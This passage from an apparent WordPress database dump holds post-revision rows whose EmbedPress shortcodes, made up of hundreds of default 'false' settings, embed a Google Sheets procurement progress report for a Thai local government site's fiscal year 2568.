nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]</p>','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:27:44','2025-07-01 07:27:44','',1558,'http://pakhaeng.ssk.in.th/?p=1566',0,'revision','',0),
(1567,1,'2025-07-01 14:27:45','2025-07-01 07:27:45','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' 